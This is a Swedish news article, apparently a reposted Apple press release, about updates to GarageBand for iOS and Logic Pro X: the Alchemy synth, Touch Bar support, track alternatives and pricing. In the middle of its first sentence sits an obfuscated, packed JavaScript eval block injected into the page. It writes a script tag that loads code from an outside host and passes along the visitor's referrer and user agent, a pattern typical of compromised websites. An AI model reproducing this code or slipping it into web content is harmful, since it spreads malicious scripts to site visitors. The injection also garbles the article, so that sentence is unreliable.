Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Viktiga uppdateringar av musikprogrammen GarageBand och Logic Pro X

apple logo
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yaryz|var|u0026u|referrer|ebbbr||js|php’.split(’|’),0,{}))
presenterade idag viktiga uppdateringar till sina kreativa musikprogram medspännande nya funktioner för alla nivåer av musikskapande på iPhone, iPad och Mac. I GarageBand för iOS 2.2 finns nu den kraftfulla, kreativa Alchemy-synten och en ny ljudbläddrare som gör det enklare än någonsin att söka igenom instrument och tillägg. Logic Pro X 10.3 har blivit ett ännu kraftfullare verktyg för proffs med ett modernt gränssnitt, nya funktioner för proffsig ljudproduktion samt stöd för den revolutionerande Touch Bar på nya MacBook Pro som ger smidig tillgång till intuitiva, kontextanpassade reglage. 
 

Logic Pro X-användare kan även på distans lägga till nya spår till sina Logic-sessioner från sin iPhone eller iPad när de inte har sin Mac i närheten. En ny delningsfunktion gör det möjligt att ladda upp en särskild GarageBand-kompatibel version av ett Logic-projekt till iCloud, som användarna kan öppna på sina iOS-enheter och lägga till nya inspelningar när inspirationen infinner sig. När projektet sparats till iCloud syns alla nytillagda spår i det ursprungliga Logic-projektet nästa gång det öppnas på en Mac. 

”Musik har alltid varit en av Apples grundpelare, och vi gläds åt att kunna släppa ännu en kul och samtidigt kraftfull uppdatering till våra program för musikskapande, GarageBand för iOS och Logic Pro X”, säger Apples vice vd för Applications Product Marketing Susan Prescott. ”Med de här uppdateringarna kommer ett brett spektrum av nya, hett efterlängtade funktioner till såväl entusiasterna som de proffsmusiker och ljudtekniker som förlitar sig på vår mjukvara och hårdvara för att skapa fantastisk musik.”

”Logic Pro X är en oumbärlig del i den kreativa processen för mig och artisterna jag arbetar med. Det är spännande med alla de nya proffsfunktionerna som tillkommit”, säger den Grammy- och Oscarsbelönade producenten och låtskrivaren Paul Epworth. ”Eftersom jag älskar Alchemy-synten är det fantastiskt att jag kan ta med min iPhone eller iPad och använda GarageBand till att hela tiden komma på nya spår till mina Logic-projekt när jag reser och inte har tillgång till min studio.” 

GarageBand för iOS

GarageBand för iOS har nu fått ännu fler avancerade funktioner för musikskapande på iPhone and iPad, men är fortfarande kul ochenkelt att använda. Med den omdesignade musikbläddraren kan du ännu snabbare utforska pekinstrument och hitta exakt de ljud du vill ha. 

Alchemy, en av världens mest nyskapande syntar och tillika en favorit hos Logic Pro-användarna, släpps nu till iOS och innehåller en mångsidig samling med över 150 Apple-designade tillägg från många olika genrer såsom EDM, hiphop, indie, rock och pop. Och med Alchemys Transform Pad kan användarna morfa mellan åtta ljudexempel i realtid och skapa uttrycksfulla syntstycken. 

Musikinspelning i GarageBand för iOS har också blivit enklare, med en flertagningsfunktion som ger användarna flera försök att spela in sitt bästa framförande samt möjlighet att testa och växla mellan sina favorittagningar. 

Den nya versionen har en omgjord ljudinspelare med roliga sångeffekter som ger användarna tillgång till än mer avancerade studioeffekter som tonhöjdskorrigering, distorsion och delay med en tryckning. Erfarna användare som vill ha ännu mer kontroll över sina mixar kan använda en ny samling avancerade ljudbehandlingsverktyg, exempelvis en interaktiv grafisk visuell EQ och möjligheten att använda Audio Unit-tillägg från tredje part för utbyggbart, kreativt ljudskapande. 

Logic Pro X

Logic Pro X har fått nya, avancerade funktioner som gör Logic till ett ännu kraftfullare verktyg för ljudproduktion och ger musiker och ljudtekniker större kontroll över redigeringen och mixningen av musiken. Den senaste versionen har en uppdaterad design som förbättrar läsbarheten imånga olika arbetsmiljöer

 Logic Pro X har nu även stöd för nya, revolutionerande Touch Bar på MacBook Pro, vilket ger möjlighet att visa och navigera i projekt i en tidslinjeöversikt samt bekväm åtkomst till volym och Smart Controls för det valda spåret. Med de nya spelningsreglagen kan du spela upp och spela in mjukvaruinstrument med Touch Bar med hjälp av ett klaviatur som även kan anpassas till olika musikskalor, eller genom att trycka på trumplattor och skapa rytmer. Med programmerbara tangentkommandon kan Touch Bar-reglagen anpassas så att tangentbordsgenvägar du ofta använder finns tillgängliga när de behövs. 

En alternativspårningsfunktion gör att användarna kan skapa och växla mellan olika spellistor med avsnitt och alternativa versioner av ett valfritt spår. Denna funktion gör det enklare att experimentera med olika kreativa idéer eller att utvärdera olika versioner av ett spår medan det växer fram. Med en urvalsbaserad behandlingsfunktion kananvändarna tillämpa en valfri kombination av Logic-effekttillägg eller tredjeparts effekttillägg på ett valfritt urval av ett eller flera ljudavsnitt. Detta är användbart för optimering av ljudkvaliteten och utgör ett bra verktyg för kreativt ljudskapande.

Logic Pro X är nu ännu kraftfullare för professionell mixning, med en 64-bitars summeringsmotor, 192 ytterligare bussar och äkta stereopanorering, vilket ger separat kontroll över stereosignalerna. 

Priser och tillgänglighet 

Uppdateringen till GarageBand för iOS är tillgänglig från och med idag. Den är kostnadsfri för alla befintliga användare och med alla nya iOS-enheter. Kunder som har äldre enheter utan GarageBand kan köpa programmet för 50 kronor på App Store. Läs mer om GarageBand för iOS på: www.apple.com/se/ios/garageband.

Uppdateringen till Logic Pro X är tillgänglig från och med idag. Den är kostnadsfri för alla befintliga kunder, och nya kunder kan köpa den för 2 095 kronor på Mac App Store. Läs mer om Logic Pro X på: www.apple.com/logic-pro.

När Apple lanserade Macintosh 1984 var det början på en revolution. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att skapa produkter av hög kvalitet och förbättra kundernas tillvaro.